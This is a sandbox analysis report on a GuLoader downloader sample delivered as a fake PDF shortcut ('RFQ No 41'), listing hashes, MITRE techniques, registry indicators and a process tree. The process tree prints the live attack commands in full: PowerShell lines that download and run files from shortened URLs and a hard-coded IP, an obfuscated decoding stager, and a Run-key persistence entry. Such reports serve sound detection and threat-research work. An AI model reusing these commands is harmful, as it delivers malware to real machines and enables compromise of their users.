guloader | 748c0ef7a63980d4e8064b14fb95ba51947bfc7d9ccf39c6ef614026a89c39e5

General

Target

RFQ No 41 26_06_2023.pdf.lnk
Size

2KB
MD5

ba180227c26bb151e9a9dddfb0a572af
SHA1

2e52688c2280c246bf931fd130184f86d411bc5d
SHA256

748c0ef7a63980d4e8064b14fb95ba51947bfc7d9ccf39c6ef614026a89c39e5
SHA512

55da00767297a830f6209ee685d0956ae1e2a42562efcb64a46d028bfadd0bc615538e523279cf7b45d453b19c461808673d530bb45924b1807422792da4bbc7

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

5 4896 powershell.exe
7 4896 powershell.exe
9 4896 powershell.exe

flow	pid	process
5	4896	powershell.exe
7	4896	powershell.exe
9	4896	powershell.exe

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeielowutil.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ielowutil.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ielowutil.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\Software\Microsoft\Windows\CurrentVersion\Run	ielowutil.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lymph = "%Della% -w 1 $Venlig=(Get-ItemProperty -Path 'HKCU:\\bdello\\').Unacquis;%Della% ($Venlig)"	ielowutil.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

ielowutil.exe

pid process

3544 ielowutil.exe
3544 ielowutil.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeielowutil.exe

pid process

2324 powershell.exe
3544 ielowutil.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2324 set thread context of 3544 2324 powershell.exe ielowutil.exe
Drops file in Windows directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\Tasks\Reilon.vbs powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
3544	ielowutil.exe
3544	ielowutil.exe

description	pid	process	target process
PID 2324 set thread context of 3544	2324	powershell.exe	ielowutil.exe

description	ioc	process
File created	C:\Windows\Tasks\Reilon.vbs	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3259792829-1422303781-2047321929-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

powershell.exeAcroRd32.exepowershell.exe

pid	process
4896	powershell.exe
4896	powershell.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2324	powershell.exe
2324	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

ielowutil.exe

pid process

3544 ielowutil.exe

pid	process
3544	ielowutil.exe

Suspicious behavior: MapViewOfSection 12 IoCs

Processes:

powershell.exe

pid	process
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe
2324	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4896 powershell.exe
Token: SeDebugPrivilege 2324 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

2232 AcroRd32.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

AcroRd32.exeielowutil.exe

pid process

2232 AcroRd32.exe
2232 AcroRd32.exe
2232 AcroRd32.exe
2232 AcroRd32.exe
2232 AcroRd32.exe
2232 AcroRd32.exe
3544 ielowutil.exe

description	pid	process
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe

pid	process
2232	AcroRd32.exe

pid	process
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
2232	AcroRd32.exe
3544	ielowutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 3560 wrote to memory of 4896	3560	cmd.exe	powershell.exe
PID 3560 wrote to memory of 4896	3560	cmd.exe	powershell.exe
PID 3560 wrote to memory of 4896	3560	cmd.exe	powershell.exe
PID 4896 wrote to memory of 2232	4896	powershell.exe	AcroRd32.exe
PID 4896 wrote to memory of 2232	4896	powershell.exe	AcroRd32.exe
PID 4896 wrote to memory of 2232	4896	powershell.exe	AcroRd32.exe
PID 4896 wrote to memory of 3768	4896	powershell.exe	WScript.exe
PID 4896 wrote to memory of 3768	4896	powershell.exe	WScript.exe
PID 4896 wrote to memory of 3768	4896	powershell.exe	WScript.exe
PID 2232 wrote to memory of 180	2232	AcroRd32.exe	RdrCEF.exe
PID 2232 wrote to memory of 180	2232	AcroRd32.exe	RdrCEF.exe
PID 2232 wrote to memory of 180	2232	AcroRd32.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 3516	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe
PID 180 wrote to memory of 4100	180	RdrCEF.exe	RdrCEF.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\RFQ No 41 26_06_2023.pdf.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3560
- \??\UNC\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "\\localhost\c$\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" n; Invoke-WebRequest https://shorturl.at/iwAK9 -O C:\Users\Public\RFQ-INFO.pdf; C:\Users\Public\RFQ-INFO.pdf; Invoke-WebRequest https://shorturl.at/guDHW -O C:\Windows\Tasks\Reilon.vbs; C:\Windows\Tasks\Reilon.vbs
  2⤵
  - Blocklisted process makes network request
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4896
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\RFQ-INFO.pdf"
    3⤵
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2232
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      Suspicious use of WriteProcessMemory
      PID:180
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D0C1A1371FE5BD4189A64546C8BE0F8 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:3516
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C673A00B3112AF4B859E5221BD0C6EB0 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C673A00B3112AF4B859E5221BD0C6EB0 --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4100
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F976ACAEC40D434DF9AF8B49A5C4E62B --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:4088
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=82D4D3CA2F6C5D4B7E04CD6963B67B2A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=82D4D3CA2F6C5D4B7E04CD6963B67B2A --renderer-client-id=5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job /prefetch:1
        5⤵
        
        PID:4600
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C008F6B543B0A60AA9F99D9E6CBC7633 --mojo-platform-channel-handle=1892 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:4168
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7EC02E8EAB0E600EF2FF7FF10EE3E955 --mojo-platform-channel-handle=2328 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        
        PID:2636
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\Tasks\Reilon.vbs"
    3⤵
    - Checks computer location settings
    PID:3768
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Milj379 ([String]$Endoph){For($Episper=1; $Episper -lt $Endoph.Length-1; $Episper+=(1+1)){$Ddvgt=$Endoph.Substring($Episper, 1);$Fald=$Fald+$Ddvgt}$Fald;}$Gydep=Milj379 ' h tntPp : / / 1 9L4 .T5P5 .A2 2k4T. 1 8P3I/KkEnTg /uPNeGrRsSuZa s iHvSe .TiEnPfT ';$Fald01=Milj379 'CiPeSxP ';$Stryger = Milj379 'N\hsByAsMwFo w 6A4N\ WIiCn dCo wFs PFo wKeFr S hJePlTlA\Fvt1P.R0 \ pPo wFe rSsSh eClClB.deAx e ';.($Fald01) (Milj379 'A$RA dAvGe rPt iMz eH2T=O$Ae nFvM:TwSiTnHdti rL ') ;.($Fald01) (Milj379 ' $ S tRr yTgCe r =E$IA dIv egrLtPiEz e 2C+P$ISktPr yTg eSrA ') ;.($Fald01) (Milj379 'K$BE x p l oCiEtE = T( (bgOwHmPia wSiSn 3H2Z_MpsrGo c eCs sF -UFC P r o cBe sDsAIRd = $ { PEIAD } ) .UC oTm mhaHnLdiL iBnUeH) -PsTpElCiAt [Hc h aBrL] 3K4P ');.($Fald01) (Milj379 ' $FU nCl aGcseFrK B=L M$PE x pFlWoOi t [ $ ETx p l oAiCtL.Hc o uCnStq-J2 ] ');.($Fald01) (Milj379 ' $ MLoBdHtSaBgAnB=O(BTBe s t - Pta t hP $BS t rBy g e r )C -BAMn dK T(K[AI nKtAP t r ]S: : sPiBzAe T-EeYqB 8L)j ') ;if ($Modtagn) {.$Stryger $Unlacer;} else {;$Fald00=Milj379 ' SAt aRr t -UBSiPt saTVr a n s fCeOrD F-YSfo uArIc e $sGTySdieDp S- D eAsKtSiNnPa t iBoDn S$IASd v e rAt i z e 2A ';.($Fald01) (Milj379 ' $BA dUv e r t i z e 2 = $ eGnTv :Na p ppd a t a ') ;.($Fald01) (Milj379 'PIam pMo rSt -AMCo d uOl e PB iBt sgTAr a nFsMf eSrB ') ;$Advertize2=$Advertize2+'\opbrugende.Dal';while (-not $Joyf) {.($Fald01) (Milj379 'N$KJ oRy fF=I( TUe sItS-FPLa tAhS $FA dKvFe rPtFiIzHeS2S)b ') ;.($Fald01) $Fald00;.($Fald01) (Milj379 'FS t a r t -FSClEeNenpB B5 ');}.($Fald01) (Milj379 'l$ M iAl j 3B7 B=B GMeVtB-SC oHn t e n tC U$TAHdsv eAr t i z eS2A ');.($Fald01) (Milj379 ' $ HSacmFa rDtI B=T L[ S y sNtUe m .mCAoEnGviemrBt ]G: : FHrNo mLB a s eH6 4 SSt r i n g ( $ MTi lMj 3N7 )R ');.($Fald01) (Milj379 's$OF aSlVd 2F M=m K[ES yKs tCe mH.PTkeBxTt .FE n cGo d iDn g ]I: : A S C IcIS. GFe t SStDr iJnsg ( $ H a mfa rAtF) ');.($Fald01) (Milj379 'P$FR a wBnCeTs sSa = $ F aRlFd 2 . sUuDbGs t rFiPnMgr(P1A9 3T5 3P9 , 1 9S2F7 1C) ');.($Fald01) $Rawnessa;}"
      4⤵
      Checks QEMU agent file
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      PID:2324
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:5016
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:3628
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:4128
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:3400
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:4000
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:4324
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:3192
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:3784
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:1444
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:4236
    - - C:\Program Files (x86)\internet explorer\ieinstal.exe
        
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        5⤵
        
        PID:3844
    - - C:\Program Files (x86)\internet explorer\ielowutil.exe
        
        "C:\Program Files (x86)\internet explorer\ielowutil.exe"
        5⤵
        Checks QEMU agent file
        Adds Run key to start application
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:3544

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4004

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
